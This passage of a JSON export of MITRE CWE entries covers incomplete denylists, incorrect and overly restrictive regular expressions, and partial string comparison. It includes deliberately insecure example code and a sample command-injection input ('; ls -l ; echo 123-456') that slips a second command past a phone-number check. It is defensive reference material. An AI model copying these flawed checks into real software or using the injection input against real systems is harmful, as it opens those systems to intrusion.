mechanism.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"79","@_View_ID":"1000","@_Chain_ID":"692"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"78","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"434","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"98","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Denylist / Deny List","Description":"This is used by CWE and CAPEC instead of other commonly-used terms. Its counterpart is allowlist."},{"Term":"Blocklist / Block List","Description":"This is often used by security tools such as firewalls, email or web gateways, proxies, etc."},{"Term":"Blacklist / Black List","Description":"This term is frequently used, but usage has been declining as organizations have started to adopt other terms."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"Developers might begin to develop a list of bad inputs as a fast way to fix a particular weakness, instead of fixing the root cause. See [REF-141]."},{"Phase":"Architecture and Design","Note":"The design might rely solely on detection of malicious inputs as a protection mechanism."}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Detection_Methods":{"Detection_Method":{"Method":"Black Box","Description":"Exploitation of a vulnerability with commonly-used manipulations might fail, but minor variations might succeed."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Strategy":"Input Validation","Description":"Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify \\"good\\" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code attempts to stop XSS attacks by removing all occurences of \\"script\\" in an input string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public String removeScriptTags(String input, String mask) {}","xhtml:div":{"#text":"return input.replaceAll(\\"script\\", mask);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":"Because the code only checks for the lower-case \\"script\\" string, it can be easily defeated with upper-case script tags."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-2309","Description":"product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2309"},{"Reference":"CVE-2005-2782","Description":"PHP remote file inclusion in web application that filters \\"http\\" and \\"https\\" URLs, but not \\"ftp\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2782"},{"Reference":"CVE-2004-0542","Description":"Programming language does not filter certain shell metacharacters in Windows environment.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0542"},{"Reference":"CVE-2004-0595","Description":"XSS filter doesn\'t filter null characters before looking for dangerous tags, which are ignored by web browsers. MIE and validate-before-cleanse.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595"},{"Reference":"CVE-2005-3287","Description":"Web-based mail product doesn\'t restrict dangerous extensions such as ASPX on a web server, even though others are prohibited.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3287"},{"Reference":"CVE-2004-2351","Description":"Resultant XSS when only <script> and <style> are checked.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2351"},{"Reference":"CVE-2005-2959","Description":"Privileged program does not clear sensitive environment variables that are used by bash. Overlaps multiple interpretation error.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2959"},{"Reference":"CVE-2005-1824","Description":"SQL injection protection scheme does not quote the \\"\\\\\\" special character.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1824"},{"Reference":"CVE-2005-2184","Description":"Detection of risky filename extensions prevents users from automatically executing .EXE files, but .LNK is accepted, allowing resultant Windows symbolic link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2184"},{"Reference":"CVE-2007-1343","Description":"Product uses list of protected variables, but accidentally omits one dangerous variable, allowing external modification","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1343"},{"Reference":"CVE-2007-5727","Description":"Chain: product only removes SCRIPT tags (CWE-184), enabling XSS (CWE-79)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727"},{"Reference":"CVE-2006-4308","Description":"Chain: product only checks for use of \\"javascript:\\" tag (CWE-184), allowing XSS (CWE-79) using other tags","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308"},{"Reference":"CVE-2007-3572","Description":"Chain: OS command injection (CWE-78) enabled by using an unexpected character that is not explicitly disallowed (CWE-184)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3572"},{"Reference":"CVE-2002-0661","Description":"\\"\\\\\\" not in list of disallowed values for web server, allowing path traversal attacks when the server is run on Windows and other OSes.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Blacklist"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"182"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-140"}},{"attr":{"@_External_Reference_ID":"REF-141"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, "Eliminating Metacharacters", Page 435"}}]},"Notes":{"Note":{"attr":{"@_Type":"Relationship"},"xhtml:p":"Multiple interpretation errors can indirectly introduce inputs that should be disallowed. For example, a list of dangerous shell metacharacters might not include a metacharacter that only has meaning in one particular shell, not all of them; or a check for XSS manipulations might ignore an unusual construct that is supported by one web browser, but not others."}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Detection_Factors, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Alternate_Terms, Description, Detection_Factors, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms, Observed_Examples"}],"Previous_Entry_Name":{"#text":"Incomplete Blacklist","attr":{"@_Date":"2020-02-24"}}}},"185":{"attr":{"@_ID":"185","@_Name":"Incorrect Regular Expression","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software specifies a regular expression in a way that causes data to be improperly matched or compared.","Extended_Description":"When the regular expression is used in protection mechanisms such as filtering or validation, this may allow an attacker to bypass the intended restrictions on the incoming data.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"187","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"182","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":["Unexpected State","Varies by Context"],"Note":"When the regular expression is not correctly specified, data might have a different format or type than the rest of the program expects, producing resultant weaknesses or errors."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In PHP, regular expression checks can sometimes be bypassed with a null byte, leading to any number of weaknesses."}]},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-45"},"Phase":"Architecture and Design","Strategy":"Refactoring","Description":"Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject the regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor the regular expression."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-37"},"Intro_Text":"The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$phone = GetPhoneNumber();if ($phone =~ /\\\\d+-\\\\d+/) {}else {}","xhtml:br":["",""],"xhtml:div":[{"#text":"system(\\"lookup-phone $phone\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:i":"# looks like it only has hyphens and digits","xhtml:br":""},{"#text":"error(\\"malformed number!\\");","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"An attacker could provide an argument such as: \\"; ls -l ; echo 123-456\\" This would pass the check, since \\"123-456\\" is sufficient to match the \\"\\\\d+-\\\\d+\\" portion of the regular expression."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-2109","Description":"Regexp isn\'t \\"anchored\\" to the beginning or end, which allows spoofed values that have trusted values as substrings.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2109"},{"Reference":"CVE-2005-1949","Description":"Regexp for IP address isn\'t anchored at the end, allowing appending of shell metacharacters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949"},{"Reference":"CVE-2001-1072","Description":"Bypass access restrictions via multiple leading slash, which causes a regular expression to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072"},{"Reference":"CVE-2000-0115","Description":"Local user DoS via invalid regular expressions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0115"},{"Reference":"CVE-2002-1527","Description":"chain: Malformed input generates a regular expression error that leads to information exposure.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1527"},{"Reference":"CVE-2005-1061","Description":"Certain strings are later used in a regexp, leading to a resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1061"},{"Reference":"CVE-2005-2169","Description":"MFV. Regular expression intended to protect against directory traversal reduces \\".../...//\\" to \\"../\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2005-0603","Description":"Malformed regexp syntax leads to information exposure in error message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603"},{"Reference":"CVE-2005-1820","Description":"Code injection due to improper quoting of regular expression.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1820"},{"Reference":"CVE-2005-3153","Description":"Null byte bypasses PHP regexp check.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153"},{"Reference":"CVE-2005-4155","Description":"Null byte bypasses PHP regexp check.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Regular Expression Error"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"79"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 10, "Using Regular Expressions for Checking Input" Page 350"}}},"Notes":{"Note":[{"#text":"While there is some overlap with allowlist/denylist problems, this entry is intended to deal with incorrectly written regular expressions, regardless of their intended use. Not every regular expression is intended for use as an allowlist or denylist. In addition, allowlists and denylists can be implemented using other mechanisms besides regular expressions.","attr":{"@_Type":"Relationship"}},{"#text":"Regexp errors are likely a primary factor in many MFVs, especially those that require multiple manipulations to exploit. However, they are rarely diagnosed at this level of detail.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Name, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Regular Expression Error","attr":{"@_Date":"2008-09-09"}}}},"186":{"attr":{"@_ID":"186","@_Name":"Overly Restrictive Regular Expression","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A regular expression is overly restrictive, which prevents dangerous values from being detected.","Extended_Description":"This weakness is not about regular expression complexity. Rather, it is about a regular expression that does not match all values that are intended. Consider the use of a regexp to identify acceptable values or to spot unwanted terms. An overly restrictive regexp misses some potentially security-relevant values leading to either false positives *or* false negatives, depending on how the regexp is being used within the code. Consider the expression /[0-8]/ where the intention was /[0-9]/. This expression is not \\"complex\\" but the value \\"9\\" is not matched when maybe the programmer planned to check for it.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"185","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"184","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"183","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject your regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor your regular expression."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-1604","Description":"MIE. \\".php.ns\\" bypasses \\".php$\\" regexp but is still parsed as PHP by Apache. (manipulates an equivalence property under Apache)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1604"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Overly Restrictive Regular Expression"}},"Notes":{"Note":{"#text":"Can overlap allowlist/denylist errors (CWE-183/CWE-184)","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationship_Notes"}]}},"187":{"attr":{"@_ID":"187","@_Name":"Partial String Comparison","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software performs a comparison that only examines a portion of a factor before determining whether there is a match, such as a substring, leading to resultant weaknesses.","Extended_Description":"For example, an attacker might succeed in authentication by providing a small password that matches the associated portion of the larger, correct password.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1023","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control"],"Impact":["Alter Execution Logic","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char *username = \\"admin\\";char *pass = \\"password\\";int AuthenticateUser(char *inUser, char *inPass) {}int main (int argc, char **argv) {}","xhtml:br":["","","","","","","",""],"xhtml:i":"/* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */","xhtml:div":[{"#text":"if (strncmp(username, inUser, strlen(inUser))) {}if (! strncmp(pass, inPass, strlen(inPass))) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"logEvent(\\"Auth failure of username using strlen of inUser\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth success of password using strlen of inUser\\");return(AUTH_SUCCESS);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logEvent(\\"Auth fail of password using sizeof\\");return(AUTH_FAIL);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int authResult;if (argc < 3) {}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {}else {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"ExitError(\\"Usage: Provide a username and password\\");","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAuthenticatedTask(argv[1]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExitError(\\"Authentication failed\\");","attr":{"@_style":"margin-left:10px;"}}]}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"ppapaspass","xhtml:br":["","",""]}}],"Body_Text":["In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application\'s password before determining success.","As a result, this partial comparison leads to improper authentication (CWE-287).","Any of these passwords would still cause authentication to succeed for the \\"admin\\" user:","This significantly reduces the search space for an attacker, making brute force attacks more feasible.","The same problem also applies to the username, so values such as \\"a\\" and \\"adm\\" will succeed for the username.","While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-6394","Description":"Product does not prevent access to restricted directories due to partial string comparison with a public directory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6394"},{"Reference":"CVE-2004-1012","Description":"Argument parser of an IMAP server treats a partial command \\"body[p\\" as if it is \\"body.peek\\", leading to index error and out-of-bounds corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1012"},{"Reference":"CVE-2004-0765","Description":"Web browser only checks the hostname portion of a certificate when the hostname portion of the URI is not a fully qualified domain name (FQDN), which allows remote attackers to spoof trusted certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0765"},{"Reference":"CVE-2002-1374","Description":"One-character password by attacker checks only against first character of real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374"},{"Reference":"CVE-2000-0979","Description":"One-character password by attacker checks only against first character of real password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0979"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Partial Comparison"}},"Notes":{"Note":{"#text":"This is conceptually similar to other weaknesses, such as insufficient verification and regular expression errors. It is primary to some weaknesses.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Name, Observed_Examples, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Partial Comparison","attr":{"@_Date":"2018-03-27"}}}},"188":{"attr":{"@_ID":"188","@_Name":"Reliance on Data/Memory Layout","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software makes invalid assumptions about how protocol data or memory is organized at a lower level, resulting in unintended program behavior.","Extended_Description":{"xhtml:p":["When changing platforms or protocol versions, in-memory organization of data may change in unintended ways. For example, some architectures may place local variables A and B right next to each other with A on top; some may place them next to each other with B on top; and others may add some padding to each. The padding size may vary to ensure that each variable is aligned to a proper word size.","In protocol implementations, it is common to calculate an offset relative to another field to pick out a specific piece of data. Exceptional conditions, often involving new protocol versions, may add corner cases that change the data layout in an unusual way. The result can be that an implementation accesses an unintended field in the packet, treating data of one type as data of another type."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1105","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and 